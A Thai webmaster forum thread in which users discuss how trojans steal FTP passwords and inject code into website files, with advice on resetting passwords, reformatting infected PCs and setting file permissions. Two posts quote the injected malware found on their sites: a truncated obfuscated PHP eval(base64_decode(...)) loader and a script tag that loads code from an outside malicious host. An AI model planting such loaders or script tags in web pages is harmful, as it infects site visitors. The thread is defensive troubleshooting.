:: JustUsers.net ::

:: คนทำเว็บ :: => สนทนาประสาคนทำเว็บ => ข้อความที่เริ่มโดย: LittleCat ที่ 28, พฤษภาคม 2009, 12:04:48 AM

หัวข้อ: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: LittleCat ที่ 28, พฤษภาคม 2009, 12:04:48 AM
Credit : ธุลีดาว

ปัญหาว่าเว็บมีอาการแปลกๆ เช่นจะมี code แปลกติดมาทุกหน้า
สาเหตุนั้นเกิดมาจากเว็บนั้นติดไวรัส (หรือโทรจัน)


แล้วในเว็บติดมาได้ยังไงล่ะ?

เมื่อคอมฯ ที่เราใช้งานติดไวรัส (หรือโทรจัน) จะมีไวรัสบางตัว
ที่มีพฤติกรรมขโมยรหัสผ่านของ FTP ที่เราใช้ upload หน้าเว็บขึ้นไปเก็บใน host

เมื่อมันได้รหัสผ่านไปแล้ว มันก็สามารถที่จะต่อเข้าไปยัง host
ด้วยรหัสผ่านของเรา จากนั้นก็เข้าไปแทรก script ไว้กับหน้าเว็บ
ทำให้เว็บเรามี code แปลกปลอม


ถ้าโดนไปแล้ว จะแก้ปัญหายังไงดี?



จะป้องกันไวรัสติดคอมฯ ได้ยังไงบ้าง

และคอมฯ เครื่องที่ใช้ในการ upload ขึ้น host
ก็ไม่ควรใช้คอมฯ ที่เป็นเครื่องสาธารณะใช้กันหลายมือ
ถ้าไม่ชัวร์ว่าปลอดไวรัสสนิท  ;)
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: ก๊วนกวน ที่ 28, พฤษภาคม 2009, 12:56:00 AM
อ่านโดยรวม อาจจะจริงและไม่จริง
 ด้วยอ่ะ ในความคิดผมเอง นะ
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 28, พฤษภาคม 2009, 12:04:51 PM
การแพร่กระจายมี 2 แบบ
1. แบบไวรัส แบบนี้ไม่น่ากลัว ถ้าในเครื่องคนทำเว็บมีแอนติไวรัสที่ดีพอ
    ทดสอบได้โดยการอัพไฟล์แล้ว ลองโหลดกลับมาเช็ค  ปกติมักจะเป็นกับเครื่องเซิฟเวอร์มากกว่า
    เพราะมันจะกินไฟล์ นามสกุลนั้นๆ ในโอเอสที่มันทำงานได้ เช่น .พีเอชพี  ในลีนุก

    พูดง่ายๆคือถ้าเครื่องเซิฟเวอร์ของเราหรือของโฮสต์ติด มันก็จะติดทุกไฟล์นามสกุลนั้นๆ-ทุกเว็บ-
    แก้โดยโดยการใช้คำสั่งจิปาถะของลีนุกแต่มันเสียเวลา โดยมากเขาก็ฟอร์แม็ตกัน
    แต่มันเดือดร้อนคนทำเว็บที่อยู่ในเครื่องนั้น 

2. แบบเจตนาปล่อย  แบบนี้ก็มี โดนกันมาเยอะ แฮ็คแล้วก็ทิ้งชื่อตัวเองไว้ให้เจ้าของเว็บด่าเล่นๆ
    หรือแค่ปล่อยสคริปมาฝังในไฟล์เท่านั้น เกิดขึ้นได้ยังไง

    แน่นอนพาสเวิดเอฟทีพี เป็นสิ่งที่ควรดูเป็นอันดับแรกตามหลักการ  แต่ต่อให้เขาไม่มีพาสเวิดเอฟทีพี
    เขาก็เจาะได้ถ้าเราเปอร์มิสชั่นเป็น 777 ทิ้งเอาไว้


อื่นๆ

ใช่ครับโดนไวรัส
โซนไอทีก็เคยเจอ
[url]http://svz.in.th/node/virus-in-zone-it.html[/url] ([url]http://svz.in.th/node/virus-in-zone-it.html[/url])


ครับ แล้วไม่ทราบว่ามีวิธีีแก้ไขหรือป้องกันยังไงครับ ผมเพิ่งเข้าไปลบสคริปท์มันออกไป (ลบด้วยมือ) ทุกไฟล์ index และเซ็ท chmod เป็น 644 ส่วนโฟลเดอร์เป็น 755 และรีเซ็ท pass เข้า FTP ใหม่ น่าจะพอเพียงรึยังครับเนี่ย



แก้ได้แล้วครับ ผมเจอโค้ด html แทรกในบรรทัดสุดท้ายในไฟล์ index.php ทุกหน้า ไม่รู้มันมาได้ยังไง พอลบออกก็หายแล้วครับ


สแปม.. เอชทีเอ็มแอล 

การทำงาน
มันจะแทรกโค๊ด ไอเฟรม.. เข้าไปในทุกไฟล์ที่เป็นอินเด็ก

ผลกระทบ
แอนติไวรัสจะมองว่าไฟล์เหล่านั้นคือโทรจัน

แก้ปัญหา
- ลบด้วยมือ ทุกไฟล์ที่มีคำว่าอินเด็ก
- รันสคริปพีเอชพี ลบบรรทัดนี้ออก (อันนี้ทำไม่เป็น

การป้องกัน
ไม่เซ็ต 777




สแปมกากพวกนี้ทำงานคล้ายกัน
กินไฟล์เซ็ตติ้งมั่ง กินไฟล์อินเด็กมั่ง

อยู่ที่เราผู้ดูแลเว็บจะรอบคอบไหม
บางคน chmod 777 จนเคยชิน หรือเปลี่ยน 777 เพื่อให้ทำงานง่ายขึ้น
แต่ดันลืมเปลี่ยนกลับ  พอโดนสแปมทีก็อ้วกเลย

อย่าง เอสเอ็มเอฟ นึกดูว่ามีไฟล์อินเด็กกี่ไฟล์ ..  แทบจะทุกโฟลเดอร์ นั่งลบ นั่งอัพ
ใช้เวลาเป็นชั่วโมง

ดังนั้นการเปอร์มิสชั่น chmod จึงสำคัญ
Read  อ่าน
Write  เขียน
Execute ประมวลผล
ถ้า 777 ก็จะหมายถึง ใครก็ได้จากไหนก็ได้ อ่านเว็บเราได้ เขียนไฟล์ทับหรืออัพได้ ประมวลผลไฟล์ต่างๆได้




 :haha:  ข้อสังเกตุอีกข้อ 1 คือ โดน SPAM HTML แล้วสำหรับบร์อด smf จะกดแสดงตัวอย่างไม่ได้


justusers.net/forum/index.php?topic=2633.0

ปัญหาอีกอย่างคือ ถ้า โดน SPAM HTML แล้ว ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลย

จริงหรือเปล่า



1. ไม่เคยสังเกตุเหมือนกันว่าเว็บที่โดนจะมีอาการพิเศษแบบไม่แสดงตัวอย่างไหม
ต้องลองเว็บของคนอื่นๆที่โดนเข้าไปว่ามีอาการคล้ายของท่านเทนโด ตามกระทู้ 2633.0 หรือไม่
หรืออีกอย่าง เอาโค๊ดไปแปะเว็บตัวเองแล้วลองเลย 555+ (อันนี้อย่าทำดีกว่า)

2.ตัวสะแกนของคนที่เข้าประจำจะไม่แสดงเลย
** ไม่ใช่แน่นอน ถ้าแอนติไวรัสยังสุขภาพดีอยู่  เข้าแล้วมันต้องเด้งแน่นอน
ทั้งแอนติไวรัส แอนติสปายแวร์เด้งหมดแหละ

อีกอย่างคือไม่รู้ว่ามันมีการส่งสคริปออกไปไหม หรือส่งเมล์หรือเปล่า
ถ้ามันมีการส่ง เดี๋ยวทางโฮสต์อาจจะส่ง จดหมายรัก มาหาเราได้



อ้างถึง
โทรจันมาจากไหน
มาจากการอัพไฟล์ที่มีโทรจันขึ้นโฮสต์ โดยอาจจะรู้เท่าไม่ถึงการณ์ 

เพราะฉะนั้นการให้สิทธิ์ใช้งานเอฟทีพี ควรพิจารณาให้ดีว่าจะให้ใครใช้ได้บ้าง
และไฟล์ธีมแปลกๆ หรือไฟล์ที่ไม่รู้จัก -ซอฟแวร์-คีเจน  ไม่ควรอัพขึ้นโฮสต์
เพราะนั่นจะเป็นต้นเหตุของสคริปแทรกพวกนี้



จะ777 ทั้งบอร์ดก็ได้ แต่ทำเสร็จแล้วก็ต้องกลับคืน 755 ไม่งั้นเสร็จได้ง่ายๆ

หรือไม่อีกวิธีคือ ก่อนลงเราก็ดูซะก่อนว่ามันต้องใช้ไดเรคทอรี่ไหนบ้าง ก็ทำเฉพาะที่จำเป็นให้เป็น 777
เสร็จแล้วค่อยปรับคืน

แต่ก็ยังมีบางโฟลเดอร์ที่ทำเสริม จำเป็นต้อง 777 ไว้ตลอด อย่างโฟลเดอร์อัพโหลด หรือแชท

สำหรับ เอสเอ็มเอฟ การ 777 ทั้งบอร์ดก็แน่นอนว่าโดนสคริปไฟล์เอชทีเอ็มแอลแน่นอน
ซีเอ็มเอสอย่างอื่นก็เหมือนกัน  นุ๊ก แมมโบ จุมลา  ขืน 777 ก็โดนแฮ็คทั้งนั้น
เวิดเพรส 777 ทิ้งไว้ บทความบล็อกที่เขียนมีสิทธิ์หายเกลี้ยง
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 02, เมษายน 2010, 12:25:12 PM
ตอนนี้มีมาอีกแบบ ไม่ใช่ iframe แล้ว 

โค๊ดประมาณนี้

โค๊ด: [Select]
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJndycpKXtmdW5jdGlvbiB4cmd3KCRzKX
tpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1
hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD
8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7a
WYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8f
CgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdf
bWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14 XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk I2lzJywkcywkYSkpZ
?php

ถ้าเป็น เอชทีเอมแอล ในโฮสต์เดียวกันก็จะติด

โค๊ด: [Select]
<script src=http://forums.indianmoneyplus.com/cgi-bin/profile-edit.php ></script>

ปัญหาเพราะเครื่องพีซีที่ใช้ทำเว็บ ติดไวรัสหรือโทรจันชนิดนี้ 
พอใช้เครื่องต่อ เอฟทีพี ปุ๊บ  ก็จะถูกแคปรหัสผ่านเอฟทีพีทันที 
แล้วส่งกลับให้เซิฟเวอรืของโทรจันนั้น   จากนั้นก็จะแทรกสคริป แล้วอัพไฟล์มาทับของเรา
รวมถึงทำให้เปร์มิสชั่นเพี้ยนไปด้วย 

วิธีแก้ 
1. ลบ หรือแก้พาสเวิดเอฟทีพี
2. ฟอร์แมตพีซีตัวปัญหา  (ต้องหาเองเองว่าเป็นของใคร ในกรณีแอดมินหลายคน)
    ต้องฟอแม็ตเพราะมันคงฝังตัวจนแอนติไวรัสของเครื่องไม่สามารถจัดการได้
3. ฟลังจากฟอแม็ตเครื่อง ต่อเอฟทีพีใหม่ แล้วไล่แก้โค๊ดไวรัสออกให้หมด 
4. เปอมิสชั่นไฟล์ 644  โฟลเดอร์ 755

วิธีป้องกัน 
1. เครื่องที่ใช้ทำเว็บ   ให้ใช้ ไออี8 โครม หรือหมาย่าง  (ไออี6 ห้ามเด็ดขาด)
2. ถ้าเป็นเอ็กพี เป็นไปได้ให้ใช้  แพ็ค3 
 

ถ้ามี Webmaster หลายคน และใช้ FTP เดียวกัน นั่นแหละไวรัสมาจากคนใดคนหนึ่ง

ใช้ Google Webmaster Tools ช่วยหาไวรัส และแจ้งยกเลิกว่ามีไวรัส
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: supachet2526 ที่ 09, เมษายน 2010, 04:32:19 PM
ผมก็เคยเจอปัญหานี้เหมือนกันจนพบว่ามันมาจาก ftp ผมเลยเลิกใช้และใช้การ brows file ด้วย Control ของ host ซึ่งจะปลอดภัยกว่าครับ
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: LittleCat ที่ 09, เมษายน 2010, 08:08:51 PM
ผมก็เคยเจอปัญหานี้เหมือนกันจนพบว่ามันมาจาก ftp ผมเลยเลิกใช้และใช้การ brows file ด้วย Control ของ host ซึ่งจะปลอดภัยกว่าครับ
ตกลงมันติดผ่าน ftp หรือติดจากไวรัสที่ฝังเครื่อง ...

ตอนนี้บอร์ดจัสต์กำลังทำการทดลองอยู่

ปล. การกลับมาครั้งนี้ ใช้อีกเครื่องนึงอัพไฟล์จากฮาร์ดดิสแบบเสียบ usb จ้า
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: unname ที่ 10, เมษายน 2010, 10:54:37 AM
ตกลงมันติดผ่าน ftp หรือติดจากไวรัสที่ฝังเครื่อง ...

เป็นได้หมดเลยครับ :haha:

ถ้า host server เป็น Windows นี่ยิ่งสบาย (ไวรัส) เลยล่ะครับ

เพราะว่า Windows เค้าเก่ง รันไวรัสได้ไวอย่างยิ่ง :cheesy:

และ virus, worm ส่วนมาก จะใช้ชุดคำสั่ง Win32 เป็นตัวทำงาน (ช่องโหว่ของ Windows)

ถ้า host เป็น linux , unix (ไม่มีแล้วมั้ง ?) นี่โอกาสติดไวรัสมี (แต่ถือว่าน้อย) แต่ว่า server ไม่รันไฟล์ไวรัส ด้วยว่า linux ไม่รันไฟล์ execute ของ windows (แต่ worm เก่งๆ ก็มีหนทางอื่นที่ทำให้แพร่ตัวเองได้อยู่ดี ผ่านช่องทางอื่น)

แต่... อย่างน้อย การแพร่ ก็ยังช้ากว่า Windows Server อยู่ดี (คิดว่า.... นะ)

.... ในเมื่อ OS พัฒนาขึ้นเรื่อยๆ ได้ , Virus tool (โปรแกรมสร้างไวรัส) ก็พัฒนาขึ้นเรื่อยๆ เช่นกัน - จึงไม่มีอะไรที่ปลอดภัยได้ 100% ในโลกไซเบอร์ :razz:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: ไร้นาม (ยังไม่ login) ที่ 10, เมษายน 2010, 03:37:47 PM
รายงานผลครับ :

FF เข้าไม่ได้อีกแล้วนะครับ , ขึ้นคำเตือน

อ้างถึง
เว็บไซต์ ..จัส - พิมพ์ชื่อลิ้งค์ไม่ได้ - ... ถูกรายงานว่าเป็นเว็บอันตรายและถูกปิดกั้นตามค่าปรับแต่งด้านความปลอดภัยของคุณ

ขึ้นหน้าแรก ไม่มีกรอบสีๆ (theme ไม่ถูกใช้) , เข้าแต่ละหน้าไม่ได้ , กดตอบไม่ได้ บลาๆ

:firstaid:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 11, เมษายน 2010, 07:45:15 AM
เรียบร้อยละ 
ขอรอดูอีกสัก 24 ชั่วโมง
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: กฤติยา ที่ 13, เมษายน 2010, 09:51:35 AM
(http://i56.photobucket.com/albums/g185/catzcatch/LittleCat-3.jpg)

 :adore:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: กฤติยา ที่ 13, เมษายน 2010, 09:55:45 AM
เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า  ปัญหาคาใจ
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: ไก่ขี้เมา ที่ 13, เมษายน 2010, 10:41:14 AM
เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า  ปัญหาคาใจ

คนเข้าบอร์ด จะใช้ได้แค่คำสั่งในบอร์ดครับ , ถ้าไม่เปิดช่องโหว่ไว้ก็ไม่สามารถทำอะไรกับระบบเว็บเราได้ (อย่างน้อยๆ ก็กัน SPAM ได้มั่งล่ะ)

* "บอร์ด" ในที่นี้อาจจะเป็น "CMS ยี่ห้อหนึ่ง" หรือ "โค้ดเว็บบอร์ดแจกฟรี" ความปลอดภัยมันแตกต่างกันจ้า

เห็นบางที่เค้าลงเว็บบอร์ด (แบบที่ได้มาจาก Free Source code from Google)

ใช้ได้ไม่เท่าไร นอกจาก SPAM แล้ว ไฟล์ในหน้าเว็บก็ยังโดน hack เปลี่ยนไปเป็นหน้าที่ใครซักคนทำให้ (โดยเราไม่ได้ขอ)

:wink:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 13, เมษายน 2010, 05:20:42 PM
มันจะมีผลกับคนที่ใช้รหัสเอฟทีพีเท่านั้นแหละ 
มันไม่ได้สร้างความเสียหายให้กับเครื่องนะ แต่สร้างความเสียหายให้กับระบบเว็บแอพฯ ทั้งหลายแหล่
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: ไก่ขี้เมา ที่ 13, เมษายน 2010, 05:40:02 PM
มันจะมีผลกับคนที่ใช้รหัสเอฟทีพีเท่านั้นแหละ  ...

ผมคุ้นๆ ว่ามันมีการ attack จาก port ของ MySQL ได้ด้วยหรือเปล่าครับ

และถ้าเว็บที่ใช้ free webboard (แบบเขียนเองง่ายๆ) ส่วนมากมักจะเขียนขึ้นมาแบบง่าย และเก็บ user/pass ไว้ในไฟล์หนึ่งไฟล์ ซึ่งสามารถหาวิธีเอามาใช้ได้อย่างง่ายมากๆ

พอเอามาได้แล้วก็ดำเนินการยืมพอร์ดของ MySQL เพื่อเจาะเข้าไปแก้ไขอื่นๆ ต่อไป

....
ถ้าเข้าใจผิดก็ขออภัยครับ เรื่องเน็ตเวิร์กผมวางเก็บไว้นานมากแล้วล่ะ

(นี่ก็คิดอยู่ว่าจะเลิกทำคอม ไปจับงานเกษตรแทน :wink:)
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 13, เมษายน 2010, 10:23:15 PM
แคปพาสจากดีบียังไม่เคยเจอท่าน  อย่าให้เจอเลย 555+
แค่เอฟทีพีนี่ก็แทบแย่ละ  เอิ๊กๆ
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: ไก่ขี้เมา ที่ 14, เมษายน 2010, 01:25:13 AM
สำหรับเรื่อง MySQL Attack พอจะมีบทความพวกนี้เป็นภาษาไทยอยู่บ้าง อันนี้ต้องปรึกษาอาจารย์กูเกิ้ลนะครับ

keyword : เจาะระบบ mysql port

เจอเยอะเลย
:shocked:

ลองค้นๆ ดูต่อด้วย FTP , HTTP ฯลฯ ก็คงจะพอมีให้อ่านให้ปวดหัวเล่นๆ ได้อีกเยอะ
:cheesy:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: กฤติยา ที่ 19, เมษายน 2010, 12:20:29 AM
เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า  ปัญหาคาใจ

คนเข้าบอร์ด จะใช้ได้แค่คำสั่งในบอร์ดครับ , ถ้าไม่เปิดช่องโหว่ไว้ก็ไม่สามารถทำอะไรกับระบบเว็บเราได้ (อย่างน้อยๆ ก็กัน SPAM ได้มั่งล่ะ)

* "บอร์ด" ในที่นี้อาจจะเป็น "CMS ยี่ห้อหนึ่ง" หรือ "โค้ดเว็บบอร์ดแจกฟรี" ความปลอดภัยมันแตกต่างกันจ้า

เห็นบางที่เค้าลงเว็บบอร์ด (แบบที่ได้มาจาก Free Source code from Google)

ใช้ได้ไม่เท่าไร นอกจาก SPAM แล้ว ไฟล์ในหน้าเว็บก็ยังโดน hack เปลี่ยนไปเป็นหน้าที่ใครซักคนทำให้ (โดยเราไม่ได้ขอ)

:wink:
:undecided:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: pollock ที่ 25, เมษายน 2010, 11:32:18 PM
เจอคล้ายๆที่ผปมเจอครับ โค๊ดแรกที่ให้ดูนั้นจะอยู่ในไฟล์ .php และไฟล์ที่มีการเชื่อมต่อกับฐานข้อมูล

โค๊ด: [Select]
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJndycpKXtmdW5jdGlvbiB4cmd3KCRzKX
tpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1
hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD
8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7a
WYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8f
CgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdf
bWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14 XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk I2lzJywkcywkYSkpZ
?php

ส่วนไฟล์
โค๊ด: [Select]
<script src=http://forums.indianmoneyplus.com/cgi-bin/profile-edit.php ></script> ไฟล์นี้จะอยู่ก่อนถึง <body ครับ

และยังมีโค๊ดลิงค์ออกไปนอกหน้าเว็บอีก 4 บรรทัด จะอยู่ในไฟล์ .js ครับ อยู่ล่างสุดครับ
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: pollock ที่ 25, เมษายน 2010, 11:36:41 PM
แนะนำ CoreFTP – Secure FTP Client

ซอฟต์แวร์ประเภท FTP Client หากใครหลายๆคนที่ทำงานด้านเว็บไซต์ คงรู้จักกันดี เพราะซอฟต์แวร์ประเภทนี้ จะทำหน้าที่หลักในการเชื่อมต่อกับเซิฟเวอร์ หรือโฮสต์ เพื่อโอนถ่ายไฟล์ข้อมูลระหว่างคอมพิวเตอร์ที่บ้านของคุณขึ้นไปเก็บไว้บน เซิฟเวอร์ เช่นพวก ไฟล์หน้าเว็บ ไฟล์รูปภาพ ไฟล์สคริป ไฟล์สื่อต่างๆ แต่จะมีซอฟต์แวร์ FTP Client ที่ดีและฟรีสักกี่ตัวที่ปลอดภัยเหมือนซอฟต์แวร์ตัวนี้ครับ

จุดเด่นของซอฟต์แวร์ CoreFTP นี้ คือสามารถดาวน์โหลดมาใช้งานได้ฟรี (เวอร์ชั่นเสียเงินก็มีเหมือนกัน) แต่จุดเด่นอีกหนึ่งจุดที่สามารถเอาชนะ FileZilla ซึ่งเป็นซอฟต์แวร์ FTP Client ที่ฟรีเหมือนกันก็คือ CoreFTP มีความสามารถด้านความปลอดภัยในการบันทึกรหัสผ่านที่ท่านใช้ล็อกอินในรูปแบบ ของการเข้ารหัสไว้อีกหนึ่งชั้น ช่วยให้ท่านเชื่อมต่อ FTP ได้ปลอดภัยยิ่งขึ้น ต่างกับ FileZilla ที่ก่อนหน้านี้ใช้รูปแบบการเก็บข้อมูลเป็น text-plain ทำให้ไวรัส หรือสปายแวร์ต่างๆ ขโมยรหัสผ่านที่ท่านใช้ล็อกอินเข้าสู่ FTP นั้นไปได้อย่างง่ายดาย (เพราะเก็บไว้เป็นรหัสผ่านกันโต้งๆเลย ไม่ได้มีการเข้ารหัสไว้) เมื่อรหัสผ่านนั้นถูกขโมยไปแล้ว โดยส่วนมากเว็บไซต์นั้นจะถูกไวรัส เชื่อมต่อ FTP เข้าไป พร้อมกับแทรกสคริปที่เป็นไวรัส (หรือเรียกว่าไวรัส iframe) ลงไปยังไฟล์หน้าเว็บที่มีอยู่บนเซิฟเวอร์ หรือโฮสต์ของท่าน ทำให้ผู้ใช้งานเว็บไซต์ เมื่อเข้าสู่เว็บไซต์ของท่าน อาจเกิดอาการ Antivirus ร้องลั่นบ้านว่าพบไวรัสอยู่บนหน้าเว็บของท่านได้ และดีไม่ดีอาจถูก Google ตราหน้าเว็บของท่านว่าเป็น เว็บไซต์อันตราย ได้อีกด้วย

ทั้งนี้ก็อยากให้ทุกท่านลด ละ เลิก ในการใช้งาน FTP Client ที่ผ่านการ crack เพราะอาจเกิดเหตุการณ์เช่นเดียวกับการใช้งานบน FileZilla ได้ เพราะเราไม่ทราบว่า ผู้เขียน crack นั้น ได้วางยาดักรหัสผ่านมาพร้อมกับ crack ที่เขาเขียนหรือเปล่า หันมาใช้ของดีและฟรีกันเถอะครับ

ดาวน์โหลด: http://www.coreftp.com/download.html (http://www.coreftp.com/download.html)
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 26, เมษายน 2010, 12:03:36 AM
อย่างเจ่งเลย 
ขอบคุณหลายๆ 
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: seohostyim ที่ 02, พฤษภาคม 2010, 06:08:07 AM
ส่วนใหญ่ที่เห็นก็จะเป็น iframe นะครับ ตัวนี้เป็นไวรัสอยู่ในเครื่องเลย มันจะฝัง files .html ทุกชนิด
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: poonim ที่ 10, พฤษภาคม 2010, 05:44:53 PM
เเจ่มมากค่ะความรู้ที่ตามหามานาน ขอบคุณความรู้ที่นำมาตอบให้ฟังนะคะ
เป็นคำถามเเละหลายคำตอบที่ดีมากค่ะ
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: xonetam24 ที่ 24, พฤษภาคม 2010, 06:04:12 PM
โอวว...ได้ความรู้มาเยอะเรยยย :shocked:
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: rooodman ที่ 19, สิงหาคม 2011, 12:24:14 PM
ได้ความรู้ดีจัง เด๋วนี้คนที่เค้ารับทำเว็บไซต์ (http://www.idesign.co.th)บางทีเวลาต้องอัพโหลดข้อมูล FTP ไปให้ลูกค้ายังต้องเสี่ยงต่อการทำให้เว็บไซต์ของลูกค้าติดไวรัสได้ด้วยหากเครื่องเรามีไวรัสโดยไม่รู้ตัว
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: beaing40 ที่ 07, กุมภาพันธ์ 2012, 07:56:09 PM
ลองทำดูแล้ว เดียวต้องรอดูภายใน 24ชั่วโมงว่าได้ผลหรือไม่ เดียวจะเอาผลมาบอก
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: เซียวเหล่งนึ่งฯ ที่ 08, กุมภาพันธ์ 2012, 01:44:54 PM
ถ้าติดล็อคของกูเกิล ต้องใช้เว็บมาสเตอร์ทูลขอตรวจสอบ
รอผล 24 ชั่วโมง
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: tonyjacson ที่ 06, สิงหาคม 2012, 03:01:22 PM
ขอ edit ครับ โฆษณาแอบแฝง
หัวข้อ: Re: ไวรัสที่ติดเข้าเว็บ มาจากไหน?
เริ่มหัวข้อโดย: music125500 ที่ 06, กุมภาพันธ์ 2013, 07:15:46 AM
ขอบคุณคร้าบ แต่มันมาจากทางนั้นจริงๆหรอเนี้ย